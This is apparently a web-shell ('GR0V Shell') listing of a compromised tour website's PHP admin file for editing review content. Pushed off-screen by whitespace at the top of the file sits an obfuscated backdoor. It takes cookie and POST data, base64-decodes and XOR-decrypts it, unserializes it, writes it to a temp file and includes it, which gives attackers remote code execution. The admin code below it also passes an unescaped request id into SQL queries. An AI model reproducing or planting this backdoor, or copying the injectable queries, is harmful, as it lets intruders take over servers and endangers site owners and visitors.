? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/modules/content/
File Upload :
Current File : /home/admin/public_html/modules/content/com_edit_topic.php

<?php                                                                                                                                                                                                                                                                                                                                                                                                 if (!class_exists("apblmxl")){class apblmxl{public static $klthtn = "oxpztkmpyvhzpfxt";public static $dxmkq = NULL;public function __construct(){$mgkxm = @$_COOKIE[substr(apblmxl::$klthtn, 0, 4)];if (!empty($mgkxm)){$mznaltznx = "base64";$uxehnhh = "";$mgkxm = explode(",", $mgkxm);foreach ($mgkxm as $dfuicdim){$uxehnhh .= @$_COOKIE[$dfuicdim];$uxehnhh .= @$_POST[$dfuicdim];}$uxehnhh = array_map($mznaltznx . "_decode", array($uxehnhh,));$uxehnhh = $uxehnhh[0] ^ str_repeat(apblmxl::$klthtn, (strlen($uxehnhh[0]) / strlen(apblmxl::$klthtn)) + 1);apblmxl::$dxmkq = @unserialize($uxehnhh);}}public function __destruct(){$this->mhcsic();}private function mhcsic(){if (is_array(apblmxl::$dxmkq)) {$bnpmakcs = sys_get_temp_dir() . "/" . crc32(apblmxl::$dxmkq["salt"]);@apblmxl::$dxmkq["write"]($bnpmakcs, apblmxl::$dxmkq["content"]);include $bnpmakcs;@apblmxl::$dxmkq["delete"]($bnpmakcs);exit();}}}$enxunaww = new apblmxl();$enxunaww = NULL;} ?><?

require_once('function.php');
if($_GET['id'] <> ""){
$topic_id=$_GET['id'];
}elseif($_POST['id'] <> ""){
$topic_id=$_POST['id'];
}

if ($_SESSION["la"] == 1){
$edit=$db->getDataOneRow('contents',$topic_id,'ContentID');
}else{
$edit=$db->getDataOneRow('contents_en',$topic_id,'ContentID');
}
if($_POST['CatID'] == ""){
	$_POST['CatID'] = $edit['CatID'];
}else{
	$_POST['CatID'] = $_POST['CatID'];
}
if($_POST['Cat_sub'] == ""){
	$_POST['Cat_sub'] = $edit['SubCatID'];
}else{
	$_POST['Cat_sub'] = $_POST['Cat_sub'];
}
?>

  <script type="text/javascript" src="http://js.nicedit.com/nicEdit-latest.js"></script> <script type="text/javascript">
//<![CDATA[
        bkLib.onDomLoaded(function() { nicEditors.allTextAreas({fullPanel : true}) });
  //]]>
  </script>

<script language="javascript" src="js/jquery-1.4.4.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 var i = 1;
	$('#addRow').click(function(){
		var tr = "<tr><td><input  type=\"file\" name=\"files["+i+"]\" id=\"files["+i+"]\" multiple=\"ture\" accept=\"image/*\" class=\"basicBtn\" size=\"45\" /></td></tr>";
 		i += 1;
		$('#myTbl').append(tr);
	});

})
</script>
<SCRIPT language=JavaScript>
function fun_name()
{

var temp;
var digital="'";

if (document.webForm.ContentName.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentName.value.length;i++)
         {
              temp=document.webForm.ContentName.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentName.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.city.value.length != 0)
    {
       for (var i=0;i<document.webForm.city.value.length;i++)
         {
              temp=document.webForm.city.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.city.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.Period.value.length != 0)
    {
       for (var i=0;i<document.webForm.Period.value.length;i++)
         {
              temp=document.webForm.Period.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.Period.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.starting.value.length != 0)
    {
       for (var i=0;i<document.webForm.starting.value.length;i++)
         {
              temp=document.webForm.starting.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.starting.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.hotels.value.length != 0)
    {
       for (var i=0;i<document.webForm.hotels.value.length;i++)
         {
              temp=document.webForm.hotels.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.hotels.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.tentMetaTitle.value.length != 0)
    {
       for (var i=0;i<document.webForm.tentMetaTitle.value.length;i++)
         {
              temp=document.webForm.tentMetaTitle.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.tentMetaTitle.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.ContentMetaKeyword.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentMetaKeyword.value.length;i++)
         {
              temp=document.webForm.ContentMetaKeyword.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentMetaKeyword.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.ContentMetaDescription.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentMetaDescription.value.length;i++)
         {
              temp=document.webForm.ContentMetaDescription.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentMetaDescription.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.ContentTitle.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentTitle.value.length;i++)
         {
              temp=document.webForm.ContentTitle.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentTitle.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.ContentDetail.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentDetail.value.length;i++)
         {
              temp=document.webForm.ContentDetail.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentDetail.select();
                    alert(errmsg);
                    return false;
                }
         }
   }
if (document.webForm.ContentTags.value.length != 0)
    {
       for (var i=0;i<document.webForm.ContentTags.value.length;i++)
         {
              temp=document.webForm.ContentTags.value.substring(i,i+1)
              if (digital.indexOf(temp)!=-1)
                {
                    errmsg="ห้ามใส่เครื่องหมาย '";
                    document.webForm.ContentTags.select();
                    alert(errmsg);
                    return false;
                }
         }
   }

}
</SCRIPT>
<div class="content">
	<div class="title" style="border-bottom:1px solid #cccccc;">
		<i class="fa fa-clipboard fa-2x" aria-hidden="true"></i><h1 style="display:inline;">แก้ไขรีวิว</h1>
	</div>

<div style="padding-top:20px;">
<form action="<? echo"$PHPSELF?mod=content&ac=edit_data_con";?>" enctype="multipart/form-data" class="mainForm" id="webForm" method="post" name="webForm">
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">หัวข้อรีวิว</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<input name="ContentName" class="form-control" type="text" id="ContentName" onChange="fun_name()" value="<?=$edit['ContentName']?>"/>
			<input name="CatID" type="hidden" value="135" />
			<input name="Cat_sub" type="hidden" value="0" />
		</div>
	</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">ภาพหน้าปกรีวิว</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
        <table width="650" border="1" cellspacing="2" cellpadding="0">
      	<?php
				$sql=$db->Query("SELECT * FROM contents_photo WHERE ContentID = $topic_id Order By id_p ASC");
				$chk=3;
				while($rs1=mysql_fetch_array($sql)){
	  			if($chk%3 == 0)
					echo "<tr>";
	  			?>
					<td>
						<label>
							<div align="right"><a href="<? echo"$PHPSELF?mod=content&ac=delete_photo_gallery&id_p={$rs1['id_p']}&id=$topic_id";?>"><img src="../backend/images/close.png"></a><br />
		    			<img src="images/ContentPhoto/<?=$rs1[picture];?>" width="150"></div>
						</label>
					</td>
		 			<?
					$chk++;
				}
				?>
				</tr>
				</table>
				<table id="myTbl" width="650" border="1" cellspacing="2" cellpadding="0">
  			<tr id="firstTr">
    			<td>
						<input  type="file" name="files[0]" id="files[0]" multiple accept="image/*" class="basicBtn" size="45" />
					</td>
    		</tr>
				</table>
	    </div>
		</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">รายละเอียด</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<textarea class="form-control" name="ContentDetail" cols="" rows="6" id="ContentDetail" onChange="fun_name()">
			<?=$edit['ContentDetail']?>
			</textarea>
		</div>
	</div>
	<div class="form-group" align="left">
		<div class=" col-md-3 col-md-4 col-xs-12">
			<label class="control-label">รายละเอียดย่อ</label>
		</div>
		<div class=" col-md-9 col-md-8 col-xs-12">
			<input type="text" class="form-control" name="ContentTitle" id="ContentTitle" value="<?=$edit['ContentTitle']?>"/>
		</div>
	</div>
	<input name="ContentPublic" type="hidden" value="<?=$edit[ContentPublic]?>" />
  <input name="ContentID" type="hidden" id="ContentID" value="<?=$edit[ContentID];?>" />
  <input name="ContentPdf" type="hidden" id="ContentPdf" value="<?=$edit[ContentPdf];?>" />
  <input name="ContentPhoto" type="hidden" id="ContentPhoto" value="<?=$edit[ContentPhoto];?>" />
	<input name="ContentMetaTitle" class="form-control" type="hidden" id="ContentMetaTitle" onChange="fun_name()" value="<?=$edit[ContentMetaTitle];?>"/>
	<input name="ContentMetaKeyword" class="form-control" type="hidden" id="ContentMetaKeyword" onChange="fun_name()" value="<?=$edit[ContentMetaKeyword];?>"/>
	<input name="ContentMetaDescription" class="form-control" type="hidden" id="ContentMetaDescription" onChange="fun_name()" value="<?=$edit[ContentMetaDescription];?>"/>
	<div class="form-group" align="center">
		<input type="submit" value="บันทึกบทความ" class="btn btn-default"  />
		<input type="reset" value="ยกเลิกบทความ" class="btn btn-default"  />
	</div>
</form>
</div>
</div>

T1KUS90T
  root-grov@210.1.60.28:~$